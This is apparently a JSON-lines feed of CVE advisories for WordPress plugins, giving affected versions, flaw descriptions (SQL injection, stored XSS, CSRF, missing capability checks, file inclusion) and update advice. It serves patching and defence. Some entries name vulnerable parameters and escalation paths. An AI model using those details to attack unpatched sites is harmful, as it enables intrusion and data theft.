{"CVE_ID":"CVE-2024-6869","slug":"falang","versionImpact":"1.3.52","versionEndExcluding":"1.3.53","description":"The Falang multilanguage for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.3.52. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete translations and expose the administrator email address.","recommendation":"Update to version 1.3.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/falang\\\/trunk\\\/admin\\\/class-falang-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/falang\\\/trunk\\\/admin\\\/class-falang-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131499\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131499\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4417","slug":"falang","versionImpact":"1.3.49","versionEndExcluding":"1.3.50","description":"The Falang multilanguage for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.49 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b62949fd-d73f-4c42-82c7-c29986bca1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b62949fd-d73f-4c42-82c7-c29986bca1da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082466%40falang%2Ftrunk&old=3059173%40falang%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082466%40falang%2Ftrunk&old=3059173%40falang%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1795","slug":"woocommerce-products-filter","versionImpact":"1.3.5.2","versionEndExcluding":"1.3.5.3","description":"The HUSKY \u2013 Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1796","slug":"woocommerce-products-filter","versionImpact":"1.3.5.1","versionEndExcluding":"1.3.5.2","description":"The HUSKY \u2013 Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'swoof_slug'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13368","slug":"youzify","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the youzify_offer_banner() function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary site options to a value of one.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/core\\\/functions\\\/youzify-general-functions.php#L961\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/core\\\/functions\\\/youzify-general-functions.php#L961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2abd5b-3067-4dcd-a650-b543fa03437b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2abd5b-3067-4dcd-a650-b543fa03437b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11332","slug":"hipaatizer","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The HIPAA Compliant Forms with Drag\u2019n\u2019Drop HIPAA Form Builder. Sign HIPAA documents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hipaatizer' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192694%40hipaatizer&new=3192694%40hipaatizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192694%40hipaatizer&new=3192694%40hipaatizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988a7d0a-72d2-4962-bcb4-b08859de925c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988a7d0a-72d2-4962-bcb4-b08859de925c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-36529","slug":"houzez-crm","versionEndExcluding":"1.3.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme allows SQL Injection.This issue affects Houzez - Real Estate WordPress Theme: from n\/a through 1.3.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/houzez-crm\\\/wordpress-houzez-crm-plugin-1-3-3-sql-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/houzez-crm\\\/wordpress-houzez-crm-plugin-1-3-3-sql-injection?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2329","slug":"wc-gsheetconnector","versionEndExcluding":"1.3.5","description":"The WooCommerce Google Sheet Connector WordPress plugin through 1.3.4 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e58f099-e8d6-49e4-9f02-d6a556c5b1d2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e58f099-e8d6-49e4-9f02-d6a556c5b1d2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0500","slug":"wp-film-studio","versionEndExcluding":"1.3.5","description":"The WP Film Studio WordPress plugin before 1.3.5 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95a6a11e-da5d-4fac-aff6-a3f7624682b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95a6a11e-da5d-4fac-aff6-a3f7624682b7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8669","slug":"backuply","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter passed to the backuply_wp_clone_sql() function in all versions up to, and including, 1.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a061553-c988-4a31-a0a2-7a2608faa33f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a061553-c988-4a31-a0a2-7a2608faa33f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151205\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151205\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4562","slug":"meks-flexible-shortcodes","versionEndExcluding":"1.3.5","description":"The Meks Flexible Shortcodes WordPress plugin before 1.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2013d79b-e9f6-4a5a-b421-e840a3bae063\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2013d79b-e9f6-4a5a-b421-e840a3bae063\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11643","slug":"allaccessible","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allaccessible\\\/trunk\\\/allaccessible.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allaccessible\\\/trunk\\\/allaccessible.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202017\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202017\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2326","slug":"gsheetconnector-gravity-forms","versionEndExcluding":"1.3.5","description":"The Gravity Forms Google Sheet Connector WordPress plugin before 1.3.5, gsheetconnector-gravityforms-pro WordPress plugin through 1.3.5 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f922695a-b803-4edf-aadc-80c79d99bebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f922695a-b803-4edf-aadc-80c79d99bebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1783","slug":"gallery-styles","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Gallery Styles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery Block in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-styles\\\/tags\\\/1.3.4\\\/gallery-styles.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-styles\\\/tags\\\/1.3.4\\\/gallery-styles.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251908\\\/gallery-styles\\\/trunk\\\/gallery-styles.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251908\\\/gallery-styles\\\/trunk\\\/gallery-styles.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9443e36-648c-4984-8b06-28e9da959e26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9443e36-648c-4984-8b06-28e9da959e26?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13389","slug":"cliptakes","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Cliptakes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cliptakes_input_email' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226472\\\/cliptakes\\\/tags\\\/1.3.5\\\/public\\\/class-cliptakes-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226472\\\/cliptakes\\\/tags\\\/1.3.5\\\/public\\\/class-cliptakes-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a939be31-7475-4626-ba1b-af9a9d6d5eda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a939be31-7475-4626-ba1b-af9a9d6d5eda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5955","slug":"contact-form-to-email","versionImpact":"1.3.43","versionEndExcluding":"1.3.44","description":"The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.3.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b5fce7e-14fc-4548-8747-96fdd58fdd98\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b5fce7e-14fc-4548-8747-96fdd58fdd98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4707","slug":"materialis-companion","versionImpact":"1.3.41","versionEndExcluding":"1.3.42","description":"The Materialis Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's materialis_contact_form shortcode in all versions up to, and including, 1.3.41 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca4dff0-ca3a-44cf-a30b-36b31d2848ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca4dff0-ca3a-44cf-a30b-36b31d2848ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/materialis-companion\\\/trunk\\\/theme-data\\\/materialis\\\/functions.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/materialis-companion\\\/trunk\\\/theme-data\\\/materialis\\\/functions.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097691%40materialis-companion&new=3097691%40materialis-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097691%40materialis-companion&new=3097691%40materialis-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4762","slug":"materialis-companion","versionEndExcluding":"1.3.40","description":"The Materialis Companion WordPress plugin before 1.3.40 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4500566a-e5f2-40b8-a185-2bcace221b4e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4500566a-e5f2-40b8-a185-2bcace221b4e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37968","slug":"falang","versionEndExcluding":"1.3.40","description":"Cross-Site Request Forgery (CSRF) vulnerability in Faboba Falang multilanguage for WordPress plugin <=\u00a01.3.39 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/falang\\\/wordpress-falang-multilanguage-plugin-1-3-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/falang\\\/wordpress-falang-multilanguage-plugin-1-3-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13370","slug":"youzify","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the save_addon_key_license() function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options to a value of a valid license key.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/class-youzify-admin.php?desc=1#L1348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/class-youzify-admin.php?desc=1#L1348\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234d676-86ac-47ab-b8b3-b0459cbb4538?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234d676-86ac-47ab-b8b3-b0459cbb4538?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1125","slug":"ruby-help-desk","versionEndExcluding":"1.3.4","description":"The Ruby Help Desk WordPress plugin before 1.3.4 does not ensure that the ticket being modified belongs to the user making the request, allowing an attacker to close and\/or add files and replies to tickets other than their own.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8a4b6ab-47f8-495d-a22c-dcf914dfb58c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8a4b6ab-47f8-495d-a22c-dcf914dfb58c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2030","slug":"contact-form-entries","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/templates\\\/leads-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/templates\\\/leads-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/contact-form-entries.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/contact-form-entries.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046066\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046066\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5250","slug":"grid-plus","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Grid Plus plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.2 via a shortcode attribute. This allows subscriber-level, and above, attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files with arbitrary content can be uploaded and included. This is limited to .php files.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/grid.plus.base.class.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/grid.plus.base.class.php#L19\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6407792-2c76-4149-a9f9-d53002135bec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6407792-2c76-4149-a9f9-d53002135bec?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11786","slug":"login-with-vipps","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Login with Vipps and MobilePay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'continue-with-vipps' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-vipps\\\/tags\\\/1.3.3\\\/VippsLogin.class.php#L724\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-vipps\\\/tags\\\/1.3.3\\\/VippsLogin.class.php#L724\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197620\\\/login-with-vipps\\\/trunk\\\/VippsLogin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197620\\\/login-with-vipps\\\/trunk\\\/VippsLogin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d015e6ce-641c-4d68-b42b-03c039e973bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d015e6ce-641c-4d68-b42b-03c039e973bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0360","slug":"location-weather","versionEndExcluding":"1.3.4","description":"The Location Weather WordPress plugin before 1.3.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba653457-415f-4ab3-a792-42640b59302b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba653457-415f-4ab3-a792-42640b59302b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2718","slug":"contact-form-to-email","versionEndExcluding":"1.3.38","description":"The Contact Form Email WordPress plugin before 1.3.38 does not escape submitted values before displaying them in the HTML, leading to a Stored XSS vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ad824a6-2d49-4f02-8252-393c59aa9705\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ad824a6-2d49-4f02-8252-393c59aa9705\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6412","slug":"html-forms","versionImpact":"1.3.33","versionEndExcluding":"1.3.34","description":"The HTML Forms  WordPress plugin before 1.3.34 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eb0dad6-3c19-4fe4-a20d-d45b51410444\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9eb0dad6-3c19-4fe4-a20d-d45b51410444\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
